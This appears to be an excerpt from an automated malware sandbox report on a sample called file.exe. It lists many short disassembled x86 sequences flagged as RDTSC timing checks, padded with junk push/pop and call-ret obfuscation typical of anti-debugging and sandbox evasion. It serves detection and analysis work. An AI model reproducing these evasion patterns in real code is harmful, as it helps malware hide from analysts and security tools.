                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B47D second address: 125B489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B489 second address: 125B48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B48D second address: 125B4A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DC63 second address: 125DC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E706 second address: 125E70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E70C second address: 125E710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E7B4 second address: 125E7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FD9A second address: 125FE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E68h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F39A52A2E67h 0x00000011 nop 0x00000012 mov esi, dword ptr [ebp+122D24BCh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F39A52A2E58h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov esi, dword ptr [ebp+122D3BDEh] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 je 00007F39A52A2E56h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FE0E second address: 125FE18 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126121F second address: 1261229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F39A52A2E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261008 second address: 1261036 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F39A52A77CEh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F39A52A77D7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261229 second address: 126125F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub esi, 2E2515F4h 0x00000011 push 00000000h 0x00000013 je 00007F39A52A2E5Ch 0x00000019 mov dword ptr [ebp+1246BBC4h], ecx 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+1245B8A0h] 0x00000027 xchg eax, ebx 0x00000028 jo 00007F39A52A2E64h 0x0000002e push eax 0x0000002f push edx 0x00000030 jng 00007F39A52A2E56h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12638EB second address: 12638EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12657CD second address: 1265809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F39A52A2E5Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D37D1h], eax 0x00000015 push 00000000h 0x00000017 and ebx, dword ptr [ebp+122D3B3Eh] 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D3045h], edx 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F39A52A2E5Eh 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264A2D second address: 1264A37 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265809 second address: 126582B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F39A52A2E61h 0x00000008 jl 00007F39A52A2E56h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126582B second address: 126583A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jo 00007F39A52A77CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265925 second address: 1265929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265929 second address: 1265949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F39A52A77D0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265949 second address: 1265A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F39A52A2E66h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F39A52A2E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F39A52A2E58h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 movsx ebx, si 0x0000004a mov ebx, dword ptr [ebp+122D39DEh] 0x00000050 mov dword ptr fs:[00000000h], esp 0x00000057 call 00007F39A52A2E65h 0x0000005c mov dword ptr [ebp+122D1A70h], eax 0x00000062 pop edi 0x00000063 mov eax, dword ptr [ebp+122D0E41h] 0x00000069 jmp 00007F39A52A2E64h 0x0000006e push FFFFFFFFh 0x00000070 and di, C8A8h 0x00000075 jmp 00007F39A52A2E5Fh 0x0000007a nop 0x0000007b pushad 0x0000007c jmp 00007F39A52A2E5Bh 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265A13 second address: 1265A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265A17 second address: 1265A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265A1B second address: 1265A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F39A52A77D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A99 second address: 1267AC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F39A52A2E5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267AC6 second address: 1267ACC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A992 second address: 126A9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F39A52A2E56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269C2E second address: 1269C46 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F39A52A77CBh 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B93C second address: 126B940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B940 second address: 126B952 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F39A52A77C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BA95 second address: 126BA9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F39A52A2E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BB76 second address: 126BBA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F39A52A77D9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BBA9 second address: 126BBAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CBF1 second address: 126CC02 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F39A52A77C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CC02 second address: 126CC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F39A52A2E56h 0x0000000a popad 0x0000000b jnc 00007F39A52A2E5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E96A second address: 126E96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126E96F second address: 126E98C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DB63 second address: 126DB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FA62 second address: 126FA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FA66 second address: 126FAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A77D4h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D17EDh], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F39A52A77C8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007F39A52A77D7h 0x00000034 mov di, FE49h 0x00000038 push 00000000h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FAD1 second address: 126FAD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FAD7 second address: 126FAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F39A52A77C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271796 second address: 12717C6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A2E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007F39A52A2E5Ch 0x00000013 xor ebx, 0369E339h 0x00000019 push 00000000h 0x0000001b sbb di, A4E4h 0x00000020 push 00000000h 0x00000022 movzx ebx, di 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 jo 00007F39A52A2E56h 0x0000002f pop eax 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12729A6 second address: 12729B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A2A second address: 1275A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A30 second address: 1275A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A35 second address: 1275A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275A3B second address: 1275A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127AC49 second address: 127AC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A812 second address: 127A81B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280668 second address: 128066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128066E second address: 1280672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280672 second address: 1280681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128079B second address: 128079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128079F second address: 12807A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12807A3 second address: 12807C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F39A52A77D1h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12807C6 second address: 12807CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281A79 second address: 1281AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D7h 0x00000007 jp 00007F39A52A77C8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F39A52A77CEh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12205BD second address: 12205C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286F47 second address: 1286F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286F4B second address: 1286F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1287281 second address: 128728B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F39A52A77C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C27B second address: 128C2A8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F39A52A2E6Bh 0x00000008 jmp 00007F39A52A2E65h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F39A52A2E5Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219894 second address: 1219898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219898 second address: 12198AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A2E60h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125785A second address: 12578C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D7h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F39A52A77C8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 xor edx, dword ptr [ebp+122D38DEh] 0x0000002d lea eax, dword ptr [ebp+124895D4h] 0x00000033 mov edi, dword ptr [ebp+122D1A92h] 0x00000039 nop 0x0000003a push esi 0x0000003b jl 00007F39A52A77CCh 0x00000041 ja 00007F39A52A77C6h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12578C6 second address: 12578CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12578CA second address: 12578DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257AB7 second address: 1257ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257ABB second address: 1257ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257EF4 second address: 1257EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F39A52A2E56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257EFF second address: 1257F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d jnl 00007F39A52A77C6h 0x00000013 pop ecx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257F1F second address: 1257F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125801B second address: 1258021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258021 second address: 1258025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580A9 second address: 12580AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580AE second address: 12580C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E5Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580C6 second address: 12580CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580CA second address: 12580D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F39A52A2E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580D4 second address: 12580DE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F39A52A77CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12580DE second address: 1258149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F39A52A2E58h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 jmp 00007F39A52A2E5Bh 0x00000026 mov cx, 209Ch 0x0000002a nop 0x0000002b jc 00007F39A52A2E5Eh 0x00000031 js 00007F39A52A2E58h 0x00000037 push eax 0x00000038 pop eax 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F39A52A2E5Bh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F39A52A2E64h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12582A4 second address: 12582A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12582A9 second address: 12582AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12582AF second address: 12582CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F39A52A77D1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12587A2 second address: 12587A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258C81 second address: 1258CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D1AC7h], esi 0x00000010 lea eax, dword ptr [ebp+12489618h] 0x00000016 or dx, B510h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F39A52A77D8h 0x00000023 rdtsc
